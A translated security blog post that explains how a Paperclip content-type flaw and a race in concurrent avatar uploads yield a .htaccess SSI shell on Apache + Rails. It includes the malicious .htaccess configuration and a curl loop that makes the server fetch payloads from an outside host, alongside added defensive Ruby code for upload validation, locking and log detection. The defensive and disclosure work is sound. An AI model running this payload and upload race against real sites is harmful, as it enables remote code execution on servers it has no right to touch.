Interesting Security experiment: using multi-thread Resource Competition technology to upload shell

Source: Internet
Author: User
Tags: website, server


By racing multi-threaded resources, you can upload two avatar files at the same time and achieve remote code execution in an Apache + Rails environment. This is not a fantasy, and I believe many file upload systems have this vulnerability ...... This is a very interesting security experiment. Let's take a look!

FreeBuf tips:

Rails: an efficient web framework based on Ruby.

Paperclip: a Rails image upload plug-in produced by Thoughtbot.

.htaccess: a per-directory configuration file for the Apache server. With .htaccess you can achieve folder password protection, automatic user redirection, custom error pages, changing how your file extensions are handled, banning specific IP addresses, allowing only specific IP addresses, disabling directory listings, and using other files as index files.

Lab background

Ten months ago I wrote a Paperclip vulnerability report (http://homakov.blogspot.com/2014/02/paperclip-vulnerability-leading-to-xss.html) covering versions no higher than 3.5.3. The vulnerability is simple but powerful: by forging the Content-Type header we can upload files with arbitrary extensions.

But Paperclip officially treats this as a minor issue; they only regard it as a cross-site scripting (XSS) vulnerability. Okay, a minor issue! According to my research, however, it is actually a high-risk code execution vulnerability!

Here I want to walk through the interesting attack instance against an Apache + Rails environment.

Using .htaccess as a shell

Given how the Rails framework serves files, .php or .pl files are not executed by default. However, by default a .htaccess file in the website directory can override Apache's global settings; in particular, in Apache 2.3.8 and earlier the server defaults to AllowOverride All.

Initially I tried to create a self-contained .htaccess shell, but it never worked: Apache does not apply the SSI (server-side include) processor to the .htaccess file itself, only to other files with the .htaccess extension (1.htaccess in what follows):
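The two conditions the post relies on so far are a forged Content-Type (so the client picks the stored extension) and Apache honouring a file named .htaccess inside the upload tree. The validator below is an added example, not Paperclip's code or the post author's: it derives the stored extension from the file's leading bytes, ignores the client file name and Content-Type entirely, and refuses the names Apache treats as configuration. `validate_upload` and the `MAGIC` table are assumptions of this example.

```ruby
require 'securerandom'

# Leading bytes of the only image formats this uploader accepts. The stored
# extension is chosen from this table, never from the client's file name or
# its Content-Type header (the field the Paperclip bug let an attacker forge).
MAGIC = {
  'jpg' => ["\xFF\xD8\xFF".b],
  'png' => ["\x89PNG\r\n\x1A\n".b],
  'gif' => ['GIF87a'.b, 'GIF89a'.b]
}.freeze

# Names Apache handles specially (.htaccess, .htpasswd) and extensions that
# can turn into executable or SSI content; rejected whatever the bytes say.
FORBIDDEN_NAME = /\A\.ht/i
FORBIDDEN_EXT  = /\.(htaccess|shtml|php|pl|cgi)\z/i

# Returns [:reject, reason] or [:ok, stored_name]. `name_source` exists so
# tests can pin the random name; production uses the SecureRandom default.
def validate_upload(client_name, bytes, name_source: -> { SecureRandom.hex(16) })
  base = File.basename(client_name.to_s)
  return [:reject, 'reserved Apache name'] if base.match?(FORBIDDEN_NAME)
  return [:reject, 'forbidden extension']  if base.match?(FORBIDDEN_EXT)

  # Content sniffing: the first matching signature decides the extension.
  ext, _sigs = MAGIC.find { |_, sigs| sigs.any? { |s| bytes.b.start_with?(s) } }
  return [:reject, 'content is not a supported image'] unless ext

  # Random stored name plus a content-derived extension: nothing the client
  # controls ever reaches the filesystem path.
  [:ok, "#{name_source.call}.#{ext}"]
end
```

Pair this with `AllowOverride None` on the upload directory so that even a file which slips past the validator cannot reconfigure Apache.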

<Files ~ "^\.ht">
    Require all granted
    # Order allow,deny
    # Allow from all
</Files>
Options +Includes
AddType text/html .htaccess
AddOutputFilter INCLUDES .htaccess
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
#<!--#printenv -->

This configuration means that we need to prepare two files (both disguised as profile picture uploads), .htaccess and 1.htaccess, and they must be uploaded "concurrently".

What, you say this is impossible? Then let me introduce you to concurrency.

Principle analysis

During the experiment I found that every file upload system authenticates each upload individually. For example, when a registered user uploads an avatar, the user is authenticated, and after the upload completes the existing avatar is deleted. However, most of these systems do not guard this sequence strictly, which makes it possible to upload multiple avatars at the same time.

Suppose the current avatar is 0.jpg and the file names in five requests sent at the same time are 1.jpg through 5.jpg.

The system stores these image files under the /uploads/user/%id/ directory and then deletes the old avatar 0.jpg. Which of them becomes the replacement is not fixed, because the order in which simultaneous replacement requests are processed is not deterministic; only the last request to finish takes effect in the database.

1.jpg through 5.jpg are now all present in the folder where the user's avatar is stored. The four image files that did not become the avatar are never deleted by the program. Exploited cleverly, this alone can fill up the web server's disk :)
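The race described above, modelled as an added example (not code from the post or from Paperclip): the "read old name, store new file, delete old" sequence runs once per request, and when five requests read the old name before any of them deletes, four files are orphaned. The same model then shows the fix a Rails app would apply, serializing the sequence under the user's row lock (`with_lock` in ActiveRecord). `AvatarStore`, `Barrier` and `simulate` are this example's own names.

```ruby
require 'set'

# In-memory model of one user's avatar: a Set of file names standing in for
# the upload directory and a single string standing in for the DB column.
class AvatarStore
  attr_reader :files, :current

  def initialize(initial)
    @files   = Set.new([initial])
    @current = initial
    @disk    = Mutex.new   # keeps the Set itself consistent; not the fix
    @row     = Mutex.new   # stands in for a per-user database row lock
  end

  # Naive handler: no lock spans the whole sequence. `barrier` forces every
  # worker to finish reading the old name before any delete runs, which is
  # the interleaving five simultaneous uploads produce on a busy app server.
  def racy_replace(new_file, barrier)
    old = @current
    barrier.arrive_and_wait
    @disk.synchronize { @files << new_file; @current = new_file }
    @disk.synchronize { @files.delete(old) }
  end

  # Hardened handler: the whole read/store/delete sequence holds the user's
  # row lock, so concurrent requests for one user are processed one at a time.
  def locked_replace(new_file)
    @row.synchronize do
      old = @current
      @files << new_file
      @current = new_file
      @files.delete(old)
    end
  end
end

# Minimal countdown barrier; Ruby's standard library has none.
class Barrier
  def initialize(count)
    @count, @m, @cv = count, Mutex.new, ConditionVariable.new
  end

  def arrive_and_wait
    @m.synchronize do
      @count -= 1
      if @count.zero?
        @cv.broadcast
      else
        @cv.wait(@m) while @count > 0
      end
    end
  end
end

# Runs five concurrent "uploads" for a user whose avatar is 0.jpg and reports
# what is left on disk besides the current avatar. Returns {current:, orphans:}.
def simulate(racy:, uploads: %w[1.jpg 2.jpg 3.jpg 4.jpg 5.jpg])
  store   = AvatarStore.new('0.jpg')
  barrier = Barrier.new(uploads.size)
  uploads.map { |f|
    Thread.new { racy ? store.racy_replace(f, barrier) : store.locked_replace(f) }
  }.each(&:join)
  { current: store.current, orphans: (store.files - [store.current]).to_a.sort }
end

if __FILE__ == $PROGRAM_NAME
  p simulate(racy: true)   # four orphaned uploads survive on disk
  p simulate(racy: false)  # only the current avatar remains
end
```

The barrier is only there to make the bad interleaving reproducible; on a real server the same outcome depends on timing, which is why the post's PoC fires the requests in parallel and accepts that not every run succeeds.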

Concurrent upload to obtain a shell

1. Prepare URLs for the .htaccess payloads, or simply use mine: http://sakurity.com/.htaccess and http://sakurity.com/num.htaccess (num standing for 1 to 5).
2. Use a handy tool to prepare several request packages that upload the avatar simultaneously. If you prefer curl, the following loop uploads five .htaccess files (change the upper limit if necessary).

The POC code is as follows:

# <HEADERS> and TOKEN are placeholders for the session headers and the form's authenticity_token.
for i in {1..5}; do
  curl 'http://lh:9292/users' -H <HEADERS> --data 'utf8=%E2%9C%93&_method=put&authenticity_token=TOKEN%3D&user%5Bavatar%5D=http%3A%2F%2Fsakurity.com%2F'"$i"'.htaccess' &
  curl 'http://lh:9292/users' -H <HEADERS> --data 'utf8=%E2%9C%93&_method=put&authenticity_token=TOKEN%3D&user%5Bavatar%5D=http%3A%2F%2Fsakurity.com%2F.htaccess' &
done
wait

The upload directory may end up looking like the following. Also, not all requests will succeed; I only ran eight workers (puma -w 8) here.

Here we can see that the shell already exists:
http://lh:9292/system/users/avatars/000/000/001/original/1.htaccess
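From the defender's side, as an added example that is not part of the original post: two detections run over Apache combined-format access log lines. The first flags a burst of state-changing requests from one client to one path inside a short window, the pattern the curl loop above produces; the second flags any served file under the upload tree whose name Apache could read as configuration or SSI input, such as the 1.htaccess URL just shown. The log lines are constructed for this example and the function names are its own.

```ruby
require 'time'

# Constructed sample log; paths mirror the ones in the post.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [02/Nov/2014:13:55:36 +0000] "GET /users/edit HTTP/1.1" 200 4122
  10.0.0.5 - - [02/Nov/2014:13:55:40 +0000] "POST /users HTTP/1.1" 302 0
  10.0.0.5 - - [02/Nov/2014:13:55:40 +0000] "POST /users HTTP/1.1" 302 0
  10.0.0.5 - - [02/Nov/2014:13:55:40 +0000] "POST /users HTTP/1.1" 302 0
  10.0.0.5 - - [02/Nov/2014:13:55:41 +0000] "POST /users HTTP/1.1" 302 0
  10.0.0.5 - - [02/Nov/2014:13:55:41 +0000] "POST /users HTTP/1.1" 500 0
  10.0.0.9 - - [02/Nov/2014:13:56:02 +0000] "POST /users HTTP/1.1" 302 0
  10.0.0.5 - - [02/Nov/2014:13:56:10 +0000] "GET /system/users/avatars/000/000/001/original/1.htaccess HTTP/1.1" 200 812
LOG

# Apache "combined"/"common" format: ip ident user [ts] "METHOD path proto" status ...
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

def parse_log(text)
  text.each_line.map do |line|
    m = LINE_RE.match(line) or next
    { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
      method: m[:method], path: m[:path], status: m[:status].to_i }
  end.compact
end

# Flags (ip, path) pairs that issued at least `threshold` state-changing
# requests inside any `window`-second span: the shape of a scripted
# parallel upload rather than a person clicking "save".
def upload_bursts(entries, window: 2, threshold: 3)
  entries.select { |e| %w[POST PUT PATCH].include?(e[:method]) }
         .group_by { |e| [e[:ip], e[:path]] }
         .map do |(ip, path), group|
    times = group.map { |e| e[:time] }.sort
    best = 0
    lo = 0
    times.each_with_index do |t, hi|           # sliding window over sorted times
      lo += 1 while t - times[lo] > window
      best = [best, hi - lo + 1].max
    end
    { ip: ip, path: path, max_in_window: best } if best >= threshold
  end.compact
end

# File names under the upload tree that Apache may treat as configuration
# (.ht*) or as SSI input (.shtml, or .htaccess once includes are enabled).
SUSPICIOUS_BASENAME = /\A\.ht|\.(htaccess|shtml)\z/i

def suspicious_upload_hits(entries, upload_prefix: '/system/')
  entries.select { |e|
    e[:path].start_with?(upload_prefix) && File.basename(e[:path]).match?(SUSPICIOUS_BASENAME)
  }.map { |e| e[:path] }
end

if __FILE__ == $PROGRAM_NAME
  entries = parse_log(SAMPLE_LOG)
  p upload_bursts(entries)
  p suspicious_upload_hits(entries)
end
```

The second check is also worth running directly against the upload directory on disk, since a file only shows up in the access log once someone requests it.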

 

 
